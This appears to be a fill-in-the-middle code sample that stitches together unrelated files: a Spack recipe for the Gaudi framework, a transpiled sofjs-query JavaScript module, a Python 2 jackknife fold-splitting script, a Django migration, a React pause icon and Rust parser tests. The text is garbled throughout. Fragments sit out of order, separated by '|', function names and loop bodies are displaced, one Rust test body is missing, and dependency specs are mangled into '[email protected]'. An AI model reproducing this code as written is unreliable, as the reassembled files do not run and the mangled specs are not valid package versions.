url = "https://gitlab.cern.ch/gaudi/Gaudi/-/archive/v33r1/Gaudi-v33r1.tar.gz"
tags = ['hep']
version('master', branch='master')
version('35.0', sha256='c01b822f9592a7bf875b9997cbeb3c94dea97cb13d523c12649dbbf5d69b5fa6')
version('34.0', sha256='28fc4abb5a6b08da5a6b1300451c7e8487f918b055939877219d454abf7668ae')
version('33.2', sha256='26aaf9c4ff237a60ec79af9bd18ad249fc91c16e297ba77e28e4a256123db6e5')
version('33.1', sha256='7eb6b2af64aeb965228d4b6ea66c7f9f57f832f93d5b8ad55c9105235af5b042')
version('33.0', sha256='76a967c41f579acc432593d498875dd4dc1f8afd5061e692741a355a9cf233c8')
version('32.2', sha256='e9ef3eb57fd9ac7b9d5647e278a84b2e6263f29f0b14dbe1321667d44d969d2e')
version('31.0', commit='aeb156f0c40571b5753a9e1dab31e331491b2f3e')
version('30.5', commit='2c70e73ee5b543b26197b90dd59ea4e4d359d230')
maintainers = ['drbenmorgan', "vvolkl"]
variant('optional', default=False,
description='Build most optional components and tests')
variant('docs', default=False,
description='Build documentation with Doxygen')
variant('vtune', default=False,
description='Build with Intel VTune profiler support')
# only build subdirectory GaudiExamples when +optional
patch("build_testing.patch", when="@:34.99")
# fixes for the cmake config which could not find newer boost versions
patch("link_target_fixes.patch", when="@33.0:34.99")
patch("link_target_fixes32.patch", when="@:32.2")
# These dependencies are needed for a minimal Gaudi build
depends_on('aida')
depends_on('[email protected]: +python')
depends_on('clhep')
depends_on('cmake', type='build')
depends_on('cppgsl')
depends_on('fmt', when='@33.2:')
depends_on('intel-tbb')
depends_on('libuuid')
depends_on('nlohmann-json', when="@35.0:")
depends_on('python', type=('build', 'run'))
depends_on('python@:3.7.99', when='@32.2:34.99', type=('build', 'run'))
depends_on('python@:2.99.99', when='@:32.1', type=('build', 'run'))
depends_on('py-setuptools@:45.99.99', when='^python@:2.7.99', type='build')
depends_on('py-six', type=('build', 'run')) |
# todo: this should be a test dependency only,
depends_on('py-nose', when="@35.0", type=('build', 'run'))
# Adding these dependencies triggers the build of most optional components
depends_on('cppgsl', when='+optional')
depends_on('cppunit', when='+optional')
depends_on('doxygen +graphviz', when='+docs')
depends_on('gperftools', when='+optional')
depends_on('gdb', when='+optional')
depends_on('gsl', when='+optional')
depends_on('heppdt@:2.99.99', when='+optional')
depends_on('jemalloc', when='+optional')
depends_on('libpng', when='+optional')
depends_on('libunwind', when='+optional')
depends_on('py-networkx@:2.2', when='+optional ^python@:2.7.99')
depends_on('py-networkx', when='+optional ^[email protected]:')
depends_on('py-setuptools', when='+optional')
depends_on('py-nose', when='+optional')
depends_on('relax', when='@:33.99 +optional')
depends_on('xerces-c', when='+optional')
# NOTE: pocl cannot be added as a minimal OpenCL implementation because
# ROOT does not like being exposed to LLVM symbols.
# The Intel VTune dependency is taken aside because it requires a license
depends_on('intel-parallel-studio -mpi +vtune', when='+vtune')
def cmake_args(self):
args = [
self.define_from_variant("BUILD_TESTING", "optional"),
self.define_from_variant("GAUDI_USE_AIDA", "optional"),
self.define_from_variant("GAUDI_USE_CPPUNIT", "optional"),
self.define_from_variant("GAUDI_USE_HEPPDT", "optional"),
self.define_from_variant("GAUDI_USE_JEMALLOC", "optional"),
self.define_from_variant("GAUDI_USE_UNWIND", "optional"),
self.define_from_variant("GAUDI_USE_XERCESC", "optional"),
self.define_from_variant("GAUDI_USE_DOXYGEN", "docs"),
# needed to build core services like rndmsvc
self.define("GAUDI_USE_CLHEP", True),
self.define("GAUDI_USE_PYTHON_MAJOR",
str(self.spec['python'].version.up_to(1))),
# todo:
self.define("GAUDI_USE_INTELAMPLIFIER", False),
self.define("GAUDI_USE_GPERFTOOLS", False), ]
# this is not really used in spack builds, but needs to be set
if self.spec.version < Version('34.99'):
args.append("-DHOST_BINARY_TAG=x86_64-linux-gcc9-opt")
return args
def setup_run_environment(self, env):
# environment as in Gaudi.xenv
env.prepend_path('PATH', self.prefix.scripts)
env.prepend_path('PYTHONPATH', self.prefix.python)
env.prepend_path('ROOT_INCLUDE_PATH', self.prefix.include)
def url_for_version(self, version):
major = str(version[0])
minor = str(version[1])
url = "https://gitlab.cern.ch/gaudi/Gaudi/-/archive/v{0}r{1}/Gaudi-v{0}r{1}.tar.gz".format(major, minor)
return url | depends_on('py-xenv@1:', type=('build', 'run'))
depends_on('range-v3')
depends_on('root +python +root7 +ssl +tbb +threads')
depends_on('zlib') |
index.js | 'use strict';
var _regenerator = require('babel-runtime/regenerator');
var _regenerator2 = _interopRequireDefault(_regenerator);
var _stringify = require('babel-runtime/core-js/json/stringify');
var _stringify2 = _interopRequireDefault(_stringify);
var _asyncToGenerator2 = require('babel-runtime/helpers/asyncToGenerator');
var _asyncToGenerator3 = _interopRequireDefault(_asyncToGenerator2);
var _defineProperty = require('babel-runtime/core-js/object/define-property');
var _defineProperty2 = _interopRequireDefault(_defineProperty);
var _keys = require('babel-runtime/core-js/object/keys');
var _keys2 = _interopRequireDefault(_keys);
var _assign = require('babel-runtime/core-js/object/assign');
var _assign2 = _interopRequireDefault(_assign);
function | (obj) { return obj && obj.__esModule ? obj : { 'default': obj }; }
var format = require('sofjs-format');
var SofRPC = require('sofjs-rpc');
var promiseToCallback = require('promise-to-callback');
module.exports = Sof;
function Sof(provider, options) {
var self = this;
var optionsObject = options || {};
if (!(this instanceof Sof)) {
throw new Error('[sofjs-query] the Sof object requires the "new" flag in order to function normally (i.e. `const sof = new Sof(provider);`).');
}
if (typeof provider !== 'object') {
throw new Error('[sofjs-query] the Sof object requires that the first input \'provider\' must be an object, got \'' + typeof provider + '\' (i.e. \'const sof = new Sof(provider);\')');
}
self.options = (0, _assign2['default'])({
debug: optionsObject.debug || false,
logger: optionsObject.logger || console,
jsonSpace: optionsObject.jsonSpace || 0
});
self.rpc = new SofRPC(provider);
self.setProvider = self.rpc.setProvider;
}
Sof.prototype.log = function log(message) {
var self = this;
if (self.options.debug) self.options.logger.log('[sofjs-query log] ' + message);
};
(0, _keys2['default'])(format.schema.methods).forEach(function (rpcMethodName) {
(0, _defineProperty2['default'])(Sof.prototype, rpcMethodName.replace('sof_', ''), {
enumerable: true,
value: generateFnFor(rpcMethodName, format.schema.methods[rpcMethodName])
});
});
function generateFnFor(rpcMethodName, methodObject) {
return function outputMethod() {
var performCall = function () {
var _ref = (0, _asyncToGenerator3['default'])( /*#__PURE__*/_regenerator2['default'].mark(function _callee() {
var result, methodOutputs, outputError;
return _regenerator2['default'].wrap(function _callee$(_context) {
while (1) {
switch (_context.prev = _context.next) {
case 0:
if (!(args.length < methodObject[2])) {
_context.next = 2;
break;
}
throw new Error('[sofjs-query] method \'' + protoMethodName + '\' requires at least ' + methodObject[2] + ' input (format type ' + methodObject[0][0] + '), ' + args.length + ' provided. For more information visit: https://octonion.institute/susy-go/wiki/JSON-RPC#' + rpcMethodName.toLowerCase());
case 2:
if (!(args.length > methodObject[0].length)) {
_context.next = 4;
break;
}
throw new Error('[sofjs-query] method \'' + protoMethodName + '\' requires at most ' + methodObject[0].length + ' params, ' + args.length + ' provided \'' + (0, _stringify2['default'])(args, null, self.options.jsonSpace) + '\'. For more information visit: https://octonion.institute/susy-go/wiki/JSON-RPC#' + rpcMethodName.toLowerCase());
case 4:
// set default block
if (methodObject[3] && args.length < methodObject[3]) {
args.push('latest');
}
// format inputs
this.log('attempting method formatting for \'' + protoMethodName + '\' with inputs ' + (0, _stringify2['default'])(args, null, this.options.jsonSpace));
_context.prev = 6;
inputs = format.formatInputs(rpcMethodName, args);
this.log('method formatting success for \'' + protoMethodName + '\' with formatted result: ' + (0, _stringify2['default'])(inputs, null, this.options.jsonSpace));
_context.next = 14;
break;
case 11:
_context.prev = 11;
_context.t0 = _context['catch'](6);
throw new Error('[sofjs-query] while formatting inputs \'' + (0, _stringify2['default'])(args, null, this.options.jsonSpace) + '\' for method \'' + protoMethodName + '\' error: ' + _context.t0);
case 14:
_context.next = 16;
return this.rpc.sendAsync({ method: rpcMethodName, params: inputs });
case 16:
result = _context.sent;
_context.prev = 17;
this.log('attempting method formatting for \'' + protoMethodName + '\' with raw outputs: ' + (0, _stringify2['default'])(result, null, this.options.jsonSpace));
methodOutputs = format.formatOutputs(rpcMethodName, result);
this.log('method formatting success for \'' + protoMethodName + '\' formatted result: ' + (0, _stringify2['default'])(methodOutputs, null, this.options.jsonSpace));
return _context.abrupt('return', methodOutputs);
case 24:
_context.prev = 24;
_context.t1 = _context['catch'](17);
outputError = new Error('[sofjs-query] while formatting outputs from RPC \'' + (0, _stringify2['default'])(result, null, this.options.jsonSpace) + '\' for method \'' + protoMethodName + '\' ' + _context.t1);
throw outputError;
case 28:
case 'end':
return _context.stop();
}
}
}, _callee, this, [[6, 11], [17, 24]]);
}));
return function performCall() {
return _ref.apply(this, arguments);
};
}();
var callback = null; // eslint-disable-line
var inputs = null; // eslint-disable-line
var inputError = null; // eslint-disable-line
var self = this;
var args = [].slice.call(arguments); // eslint-disable-line
var protoMethodName = rpcMethodName.replace('sof_', ''); // eslint-disable-line
if (args.length > 0 && typeof args[args.length - 1] === 'function') {
callback = args.pop();
}
var promise = performCall.call(this);
// if callback provided, convert promise to callback
if (callback) {
return promiseToCallback(promise)(callback);
}
// only return promise if no callback provided
return promise;
};
} | _interopRequireDefault |
jackknife.py | # Random shuffle by sentences instead of samples (predicates).
import math
import os
import random
import sys
from os.path import join
def get_sent_to_samples(input_file):
num_samples = 0
sent2samples = []
fin = open(input_file, 'r')
prev_words = ""
prev_predicate = -1
for line in fin:
line = line.strip()
line_left = line.split('|||')[0]
pred_id = int(line_left.split()[0])
words = ' '.join(line_left.split()[1:]
)
if not(words == prev_words and pred_id > prev_predicate):
sent2samples.append([])
prev_predicate = pred_id
prev_words = words
sent2samples[-1].append(num_samples)
num_samples += 1
fin.close()
return (sent2samples, num_samples)
def get_sample_to_folds(sent2samples, num_folds, max_num_dev_sents):
num_sents = len(sent2samples)
num_sents_per_fold = int(math.ceil(1.0 * num_sents / num_folds))
print "Read %d training samples and %d sentences. Splitting to %d folds with %d sentences each."\
% (num_samples, num_sents, num_folds, num_sents_per_fold)
sample2fold_trn = [set() for i in range(num_samples)]
sample2fold_dev = [set() for i in range(num_samples)]
# prd: the entire heldout set.
sample2fold_prd = [set() for i in range(num_samples)]
num_dev_sents = [0 for i in range(num_folds)]
num_trn_samples = [0 for i in range(num_folds)]
num_dev_samples = [0 for i in range(num_folds)]
num_prd_samples = [0 for i in range(num_folds)]
for fid in range(num_folds):
ll = fid * num_sents_per_fold
rr = min(num_sents, ll + num_sents_per_fold)
print fid, ll, rr, rr - ll
for i in range(ll, rr):
sent_id = sent_ids[i]
for sample_id in sent2samples[sent_id]:
# Assign training folds to sample.
for fid2 in range(num_folds):
if fid2 != fid:
sample2fold_trn[sample_id].add(fid2)
num_trn_samples[fid2] += 1
# Assign pred folds to sample.
sample2fold_prd[sample_id].add(fid)
num_prd_samples[fid] += 1
prd_sents = range(ll, rr)
random.shuffle(prd_sents)
for i in range(min(len(prd_sents), max_num_dev_sents)):
sent_id = prd_sents[i]
# Assign dev folds to sample.
for sample_id in sent2samples[sent_id]:
sample2fold_dev[sample_id].add(fid)
num_dev_samples[fid] += 1
num_dev_sents[fid] += 1
print sample2fold_trn[:10]
print sample2fold_dev[:10]
print sample2fold_prd[:10]
print "Num trn samples:", num_trn_samples
print "Num prd samples:", num_prd_samples
print "Num dev samples:", num_dev_samples
return (sample2fold_trn, sample2fold_dev, sample2fold_prd)
def split_file(input_file, output_files, sample2fold):
fin = open(input_file, 'r')
fout = [open(fn, 'w') for fn in output_files]
sample_id = 0
for line in fin:
for fid in sample2fold[sample_id]:
fout[fid].write(line.strip() + "\n")
sample_id += 1
fin.close()
for fo in fout:
fo.close()
if __name__ == '__main__':
RANDOM_SEED = 12345
NUM_FOLDS = 5
MAX_NUM_DEV_SENTS = 5000
input_file = sys.argv[1]
output_dir = sys.argv[2]
sent2samples, num_samples = get_sent_to_samples(input_file)
num_sents = len(sent2samples)
sent_ids = range(num_sents)
random.seed(RANDOM_SEED)
random.shuffle(sent_ids)
sample2fold_trn, sample2fold_dev, sample2fold_prd = get_sample_to_folds(sent2samples,
NUM_FOLDS,
MAX_NUM_DEV_SENTS)
# Output ids
fout_trn_ids = [open(join(output_dir, 'train.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
fout_dev_ids = [open(join(output_dir, 'devel.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
fout_prd_ids = [open(join(output_dir + 'pred.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
for sid in range(num_samples):
for fid in sample2fold_trn[sid]:
fout_trn_ids[fid].write("%d\n" % sid)
for fid in sample2fold_dev[sid]:
fout_dev_ids[fid].write("%d\n" % sid)
for fid in sample2fold_prd[sid]:
fout_prd_ids[fid].write("%d\n" % sid)
for fo in fout_trn_ids + fout_dev_ids + fout_prd_ids: | filename = input_file.split('/')[-1].split('.')[0]
print filename
split_file(input_file,
[join(output_dir, '%s.train.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_trn)
split_file(input_file,
[join(output_dir, '%s.devel.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_dev)
split_file(input_file,
[join(output_dir, '%s.pred.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_prd) | fo.close()
# Generate output files. |
0075_auto_20170124_1439.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-01-24 13:39
from __future__ import unicode_literals
| from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dynadb', '0074_auto_20170123_1212'),
]
operations = [
migrations.AlterField(
model_name='dyndbefficacy',
name='reference_id_compound',
field=models.ForeignKey(db_column='reference_id_compound', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='dynadb.DyndbCompound'),
),
migrations.AlterField(
model_name='dyndbefficacy',
name='type',
field=models.SmallIntegerField(choices=[(0, 'Full Agonist'), (1, 'Partial Agonist'), (2, 'Antagonist'), (3, 'Inverse Agonist'), (4, 'Other')], default=0),
),
] | |
PauseIcon.js | import * as React from 'react'
export default class PauseIcon extends React.Component {
render () {
return ( | <svg xmlns="http://www.w3.org/2000/svg" xmlnsXlink="http://www.w3.org/1999/xlink" width="40" height="48" viewBox="0 0 40 48">
<g fillRule="evenodd">
<path d="M2 0L14 0C15.1 0 16 0.9 16 2L16 46C16 47.1 15.1 48 14 48L2 48C0.9 48 0 47.1 0 46L0 2C0 0.9 0.9 0 2 0Z" />
<path d="M26 0L38 0C39.1 0 40 0.9 40 2L40 46C40 47.1 39.1 48 38 48L26 48C24.9 48 24 47.1 24 46L24 2C24 0.9 24.9 0 26 0Z" />
</g>
</svg>
)
}
} | |
parser.rs | extern crate cannoli;
use cannoli::lexer::Lexer;
use cannoli::parser;
use cannoli::parser::ast::*;
#[test]
fn keyword_global() {
let stream = Lexer::new("global var1, var2, var3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Global {
names: vec![String::from("var1"), String::from("var2"),
String::from("var3")]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn keyword_nonlocal() {
let stream = Lexer::new("nonlocal var1, var2, var3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Nonlocal {
names: vec![String::from("var1"), String::from("var2"),
String::from("var3")]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn pass() {
let stream = Lexer::new("pass;pass;pass;pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Pass, Statement::Pass, Statement::Pass, Statement::Pass
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("pass;pass;pass;pass;\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn empty_return() {
let stream = Lexer::new("return\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![Statement::Return { value: None }]
};
assert_eq!(ast, expected);
}
#[test]
fn or_and_test_expr() {
let stream =
Lexer::new("return True or False and False or True and False\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::BoolOp {
op: BoolOperator::Or,
values: vec![
Expression::NameConstant { value: Singleton::True },
Expression::BoolOp {
op: BoolOperator::And,
values: vec![
Expression::NameConstant {
value: Singleton::False },
Expression::NameConstant {
value: Singleton::False },
]
},
Expression::BoolOp {
op: BoolOperator::And,
values: vec![
Expression::NameConstant {
value: Singleton::True},
Expression::NameConstant {
value: Singleton::False },
]
}
]
}) }
]
};
assert_eq!(ast, expected);
}
#[test]
fn comparison() {
let stream = Lexer::new("return True < False > True <= False >= \
True != True in False not in True is False \
is not True\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Compare {
left: Box::new(
Expression::NameConstant { value: Singleton::True }
),
ops: vec![
CmpOperator::LT,
CmpOperator::GT,
CmpOperator::LE,
CmpOperator::GE,
CmpOperator::NE,
CmpOperator::In,
CmpOperator::NotIn,
CmpOperator::Is,
CmpOperator::IsNot
],
comparators: vec![
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
]
}) }
]
};
assert_eq!(ast, expected);
}
#[test]
fn return_call_expr() {
let stream = Lexer::new("func(x)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("func(x)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
let stream = Lexer::new("func(x, y, z)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("func(x, *y, z)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
},
Expression::Starred {
value: Box::new(Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
}),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("return func(1, \"test\", True, *d, **e,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Num {n: Number::DecInteger(String::from("1"))},
Expression::Str {s: String::from("test")},
Expression::NameConstant {value: Singleton::True},
Expression::Starred {
value: Box::new(Expression::Name {
id: String::from("d"),
ctx: ExprContext::Load
}),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("e"),
ctx: ExprContext::Load
}
}
]
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn return_nested_call() {
let stream = Lexer::new("return f()()()\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Call {
func: Box::new(Expression::Call {
func: Box::new(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("f"),
ctx: ExprContext::Load
}),
args: vec![],
keywords: vec![]
}),
args: vec![],
keywords: vec![]
}),
args: vec![],
keywords: vec![]
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_1() {
let stream = Lexer::new("return p[0]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Num {
n: Number::DecInteger(String::from("0"))
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_2() {
let stream = Lexer::new("return p[0,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Tuple {
elts: vec![
Expression::Num {
n: Number::DecInteger(String::from("0"))
}
],
ctx: ExprContext::Load
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_3() {
let stream = Lexer::new("return p[0,a]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Tuple {
elts: vec![
Expression::Num {
n: Number::DecInteger(String::from("0"))
},
Expression::Name {
id: String::from("a"),
ctx: ExprContext::Load
}
],
ctx: ExprContext::Load
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
// Add trailing comma, should result in the same AST
let stream = Lexer::new("return p[0,a,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_4() {
let stream = Lexer::new("return p[1:4:-1]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Slice {
lower: Some(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
upper: Some(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
step: Some(Expression::UnaryOp {
op: UnaryOperator::USub,
operand: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
})
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_5() {
let stream = Lexer::new("return p[1:4:-1,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::ExtSlice {
dims: vec![
Slice::Slice {
lower: Some(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
upper: Some(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
step: Some(Expression::UnaryOp {
op: UnaryOperator::USub,
operand: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
})
}
]
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_6() {
let stream = Lexer::new("return p[:]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Slice {
lower: None,
upper: None,
step: None
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_7() |
#[test]
fn yield_no_arg() {
let stream = Lexer::new("yield\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield { value: None } }
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_testlist_single() {
let stream = Lexer::new("yield 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield {
value: Some(Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}))
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_testlist_tuple() {
let stream = Lexer::new("yield 1,\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield {
value: Some(Box::new(Expression::Tuple {
elts: vec![Expression::Num {
n: Number::DecInteger(String::from("1"))
}],
ctx: ExprContext::Load
}))
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_from_simple() {
let stream = Lexer::new("yield from 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::YieldFrom {
value: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise() {
let stream = Lexer::new("raise\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise { exc: None, cause: None }
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise_exc() {
let stream = Lexer::new("raise Exception(\"a\")\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise {
exc: Some(Expression::Call {
func: Box::new(Expression:: Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("a") }],
keywords: vec![]
}),
cause: None
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise_exc_from_cause() {
let stream = Lexer::new("raise Exception(\"a\") from Exception(\"b\")\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise {
exc: Some(Expression::Call {
func: Box::new(Expression:: Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("a") }],
keywords: vec![]
}),
cause: Some(Expression::Call {
func: Box::new(Expression:: Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("b") }],
keywords: vec![]
}),
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn dict_creation() {
let stream = Lexer::new("{}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![],
values: vec![]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:b}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
values: vec![
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:c, **x, b:d,}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::None,
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
],
values: vec![
Expression::Name { id: String::from("c"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("x"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("d"),
ctx: ExprContext::Load }
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:c, **x, b:d}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn tuple_creation() {
let stream = Lexer::new("()\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("(a)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("(a,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a,\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
let stream = Lexer::new("(a,b)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Tuple {
elts: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load },
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
],
ctx: ExprContext::Load
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("a,b\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn list_creation() {
let stream = Lexer::new("[]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::List {
elts: vec![],
ctx: ExprContext::Load
}
}
]
};
